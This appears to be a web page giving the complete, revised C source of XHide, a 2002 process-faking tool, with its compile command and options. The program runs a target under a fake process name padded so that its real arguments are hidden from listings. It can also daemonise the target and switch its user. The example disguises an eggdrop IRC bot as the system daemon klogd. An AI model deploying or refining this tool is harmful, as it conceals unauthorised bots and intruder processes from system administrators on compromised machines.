
xhide

Fichier xhide.c

gcc xhide.c -o xhide
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
 
 
/* Forward declaration: usage() prints the option summary to stderr and exits (defined below). */
void usage(char *progname);
 
 
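/*
 * Parse an all-digit decimal id into *out.  Returns 1 on success, 0 for an
 * empty string, any non-digit character, or an out-of-range value.  Unlike
 * atoi(), which returned 0 (root!) for anything it could not parse, a bad
 * string is never mistaken for an id.
 */
static int parse_id(const char *s, unsigned long *out)
{
    const char *p;
    char *end;

    if (*s == '\0')
        return 0;
    for (p = s; *p; p++)
        if (*p < '0' || *p > '9')
            return 0;
    errno = 0;
    *out = strtoul(s, &end, 10);
    return errno == 0 && *end == '\0';
}

/*
 * Switch the calling process to another user/group before the target is
 * exec'd.  str has the form "user[:group]"; each half is looked up by name
 * first and, failing that, accepted as an all-digit id.
 *
 * Returns 1 on success, 0 on failure (a message goes to stderr).  The caller
 * must treat 0 as fatal: continuing means the target runs with the caller's
 * privileges.
 *
 * Fixed relative to the original listing:
 *  - an unknown name fell through to atoi(), so a typo in the user name
 *    silently became uid 0; unknown names are now rejected;
 *  - gid was left uninitialised when only a numeric uid was given;
 *  - a 256-byte argument left the local copy unterminated;
 *  - supplementary groups were kept across the switch; they are dropped now
 *    when running as root (setgroups() is root-only, so it is skipped
 *    otherwise);
 *  - after the switch we check that root cannot be regained (CERT POS37-C).
 */
int changeown (char *str)
{
    char user[256], *group;
    struct passwd *pwd;
    struct group *grp;
    unsigned long num;
    uid_t uid = 0;
    gid_t gid = 0;
    int have_gid = 0;

    /* reject NULL and anything that would not fit: the old strncpy() left a
       256-byte argument unterminated and the ':' scan ran off the buffer */
    if (str == NULL || strlen(str) >= sizeof(user)) {
        fprintf(stderr, "Error: bad -u argument\n");
        return 0;
    }
    memcpy(user, str, strlen(str) + 1);

    /* split "user:group" at the first ':'; group is "" when absent */
    group = strchr(user, ':');
    if (group != NULL)
        *group++ = '\0';
    else
        group = user + strlen(user);

    if ((pwd = getpwnam(user)) != NULL) {
        uid = pwd->pw_uid;
        gid = pwd->pw_gid;
        have_gid = 1;
    } else if (parse_id(user, &num) && (unsigned long)(uid_t)num == num) {
        uid = (uid_t)num;
        /* numeric uid: take the primary group from passwd when there is an
           entry; otherwise an explicit group is required below (the old
           code left gid uninitialised on this path) */
        if ((pwd = getpwuid(uid)) != NULL) {
            gid = pwd->pw_gid;
            have_gid = 1;
        }
    } else {
        fprintf(stderr, "Error: unknown user '%s'\n", user);
        return 0;
    }

    if (*group != '\0') {
        if ((grp = getgrnam(group)) != NULL) {
            gid = grp->gr_gid;
        } else if (parse_id(group, &num) && (unsigned long)(gid_t)num == num) {
            gid = (gid_t)num;
        } else {
            fprintf(stderr, "Error: unknown group '%s'\n", group);
            return 0;
        }
        have_gid = 1;
    }
    if (!have_gid) {
        fprintf(stderr, "Error: no group known for uid %lu, use uid:gid\n",
                (unsigned long)uid);
        return 0;
    }

    /* order matters: group ids first (they need root), then the uid, which
       gives root away.  setgroups() is root-only, so skip it otherwise. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0) {
        perror("Error: Can't drop supplementary groups");
        return 0;
    }
    if (setgid(gid)) {
        perror("Error: Can't set GID");
        return 0;
    }
    if (setuid(uid)) {
        perror("Error: Can't set UID");
        return 0;
    }
    /* CERT POS37-C: the drop must be permanent */
    if (uid != 0 && setuid(0) == 0) {
        fprintf(stderr, "Error: privileges could be regained\n");
        return 0;
    }

    return 1;
}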
 
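enum { FULLPATH_MAX = 4096 };   /* PATH_MAX on Linux; room for cwd + "/" + cmd */

/*
 * Resolve cmd to an absolute path the way a shell would, so the target can
 * be exec'd by path while argv[0] is replaced with the fake name.
 *  - "/x"               : returned as is (the caller's pointer, not a copy)
 *  - ".x", "./x", "../x": prefixed with the current directory, no existence
 *                         check
 *  - anything else      : searched for in $PATH; the first regular file with
 *                         any execute bit wins
 * Returns NULL when nothing matches, when $PATH is unset, on allocation
 * failure, or when a candidate would not fit in FULLPATH_MAX bytes.  The
 * result for a relative cmd is heap-allocated and owned by the caller
 * (main() never frees it because it execs right away).
 *
 * Fixed relative to the original listing: the PATH string returned by
 * getenv() was tokenised in place, which truncated the PATH in environ that
 * the exec'd target then inherited; cwd and cmd were strcat()ed into a
 * 256-byte buffer without a bound; malloc() was unchecked.
 */
char *fullpath(char *cmd)
{
    char *filename, *path, *copy, *seg, *colon;
    char cwd[FULLPATH_MAX];
    size_t pathlen;
    int len;
    struct stat st;

    if (cmd == NULL || *cmd == '\0')
        return NULL;
    if (*cmd == '/')
        return cmd;

    filename = malloc(FULLPATH_MAX);
    if (filename == NULL)
        return NULL;

    if (*cmd == '.') {
        if (getcwd(cwd, sizeof cwd) == NULL) {
            free(filename);
            return NULL;
        }
        len = snprintf(filename, FULLPATH_MAX, "%s/%s", cwd, cmd);
        if (len < 0 || len >= FULLPATH_MAX) {
            free(filename);
            return NULL;
        }
        return filename;
    }

    path = getenv("PATH");
    if (path == NULL) {
        free(filename);
        return NULL;
    }
    /* private copy: the '\0' tokenising below must never touch environ */
    pathlen = strlen(path);
    copy = malloc(pathlen + 1);
    if (copy == NULL) {
        free(filename);
        return NULL;
    }
    memcpy(copy, path, pathlen + 1);

    for (seg = copy; seg != NULL; seg = colon ? colon + 1 : NULL) {
        colon = strchr(seg, ':');
        if (colon != NULL)
            *colon = '\0';
        len = snprintf(filename, FULLPATH_MAX, "%s/%s", seg, cmd);
        if (len < 0 || len >= FULLPATH_MAX)
            continue;   /* would not fit: skip this directory */
        if (stat(filename, &st) == 0 && S_ISREG(st.st_mode)
            && (st.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH))) {
            free(copy);
            return filename;
        }
    }

    free(copy);
    free(filename);
    return NULL;
}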
 
/*
 * Print the banner and option summary to stderr, then exit with status 1.
 * progname is argv[0], echoed in the example line.  Never returns.
 */
void
usage(char *progname)
{
    /* fixed text first, then the one line that needs formatting */
    fputs("XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002\n"
          "\n"
          "Options:\n"
          "-s string\tFake name process\n"
          "-d\t\tRun aplication as daemon/system (optional)\n"
          "-u uid[:gid]\tChange UID/GID, use another user (optional)\n"
          "-p filename\tSave PID to filename (optional)\n"
          "\n",
          stderr);
    fprintf(stderr,
            "Example: %s -s \"klogd -m 0\" -d -p test.pid ./egg bot.conf\n\n",
            progname);
    exit(1);
}
 
 
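/*
 * Entry point.  Parses options, optionally switches user (-u), optionally
 * daemonises (-d), optionally records the PID (-p), then execs the target
 * with argv[0] replaced by the -s string.
 *
 * Exit status: 0 from the parents that leave during daemonisation, 1 on
 * usage errors or an unresolvable command, -1 (255) on system-call or exec
 * failure, as in the original listing.
 *
 * Fixed relative to the original listing:
 *  - fakename/pidfile were tested before ever being assigned;
 *  - -s/-u/-p as the last argument read past argv;
 *  - a failed -u switch was ignored and the target ran with the caller's
 *    privileges; it is fatal now;
 *  - newargv was allocated n*sizeof(char**)+1 bytes, short of the trailing
 *    NULL slot;
 *  - a -s string longer than 255 bytes overran fake[];
 *  - the PID file was created after umask(0), i.e. world-writable, so any
 *    local user could rewrite the PID a stop script would kill; it is now
 *    created with an explicit 0644 mode;
 *  - the /dev/null descriptor leaked into the target after dup2();
 *  - waitpid(-1, ...) was a no-op (this process never has children at that
 *    point) and is gone.
 */
int main(int argc, char **argv)
{
    char fake[256];
    char pidbuf[32];
    char *progname, *fakename = NULL;
    char *pidfile = NULL, *execst;
    int runsys = 0, null, pfd, plen;
    int i, j, n, pidnum;
    size_t flen;
    char **newargv;

    progname = argv[0];
    if (argc < 2) usage(progname);

    for (i = 1; i < argc; i++) {
        if (argv[i][0] != '-')
            break;                      /* first non-option: the command */
        switch (argv[i][1]) {
        case 's':
            if (i + 1 >= argc) usage(progname);
            fakename = argv[++i];
            break;
        case 'u':
            if (i + 1 >= argc) usage(progname);
            /* switch user right here, before anything is forked or opened,
               and refuse to go on if it fails: the point of -u is that the
               target must not keep the caller's privileges */
            if (!changeown(argv[++i])) return -1;
            break;
        case 'p':
            if (i + 1 >= argc) usage(progname);
            pidfile = argv[++i];
            break;
        case 'd':
            runsys = 1;
            break;
        default:
            usage(progname);
            break;
        }
    }

    n = argc - i;
    if (n == 0 || fakename == NULL) usage(progname);

    /* n argument pointers plus the terminating NULL that execv() requires */
    newargv = calloc((size_t)n + 1, sizeof *newargv);
    if (newargv == NULL) {
        perror("Error: calloc");
        return -1;
    }
    for (j = 0; j < n; j++) newargv[j] = argv[i + j];
    newargv[n] = NULL;

    /* fullpath() does not set errno on "not found", so name the command
       instead of calling perror() */
    execst = fullpath(newargv[0]);
    if (execst == NULL) {
        fprintf(stderr, "Full path seek: %s: not found or not executable\n", newargv[0]);
        return 1;
    }

    if (n > 1) {
        /* With further arguments, argv[0] becomes the fake name padded with
           spaces to 255 chars -- presumably so a command-line listing shows
           the fake name followed by blanks and the real arguments are pushed
           out of view (TODO confirm; the listing gives no other reason). */
        memset(fake, ' ', sizeof(fake) - 1);
        fake[sizeof(fake) - 1] = '\0';
        flen = strlen(fakename);
        if (flen > sizeof(fake) - 1) flen = sizeof(fake) - 1;   /* was an overflow */
        memcpy(fake, fakename, flen);
        newargv[0] = fake;
    } else {
        newargv[0] = fakename;
    }

    if (runsys) {
        if ((null = open("/dev/null", O_RDWR)) == -1) {
            perror("Error: /dev/null");
            return -1;
        }
        switch (fork()) {   /* 1st fork: parent leaves, child drops the session */
        case -1: perror("Error: FORK-1"); return -1;
        case  0: break;
        default: return 0;
        }
        setsid();           /* cannot fail: a fresh child is never a group leader */
        switch (fork()) {   /* 2nd fork: the grandchild can never reacquire a tty */
        case -1: perror("Error: FORK-2"); return -1;
        case  0: break;
        default: return 0;
        }
        umask(0);
        /* dup2() closes the old 0/1/2 itself; drop the spare descriptor so
           it does not leak into the target */
        dup2(null, 0);
        dup2(null, 1);
        dup2(null, 2);
        if (null > 2) close(null);
    }

    pidnum = getpid();
    if (pidfile != NULL) {
        /* explicit mode: after umask(0) a plain fopen("w") created the file
           0666.  Best effort as before: a failure is reported, not fatal. */
        pfd = open(pidfile, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (pfd == -1) {
            perror("Error: pid file");
        } else {
            plen = snprintf(pidbuf, sizeof pidbuf, "%d\n", pidnum);
            if (plen > 0 && write(pfd, pidbuf, (size_t)plen) != plen)
                perror("Error: pid file");
            close(pfd);
        }
    }

    fprintf(stderr, "==> Fakename: %s PidNum: %d\n", fakename, pidnum);
    execv(execst, newargv);
    perror("Couldn't execute");
    return -1;
}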

Options:

  • -s string Fake process name shown as argv[0] (required)
  • -d Run the application as a daemon/system process (optional)
  • -u uid[:gid] Change UID/GID, i.e. run the target as another user (optional)
  • -p filename Save the PID to filename (optional)
./xhide -s "klogd -m 0" -d -p test.pid ./egg bot.conf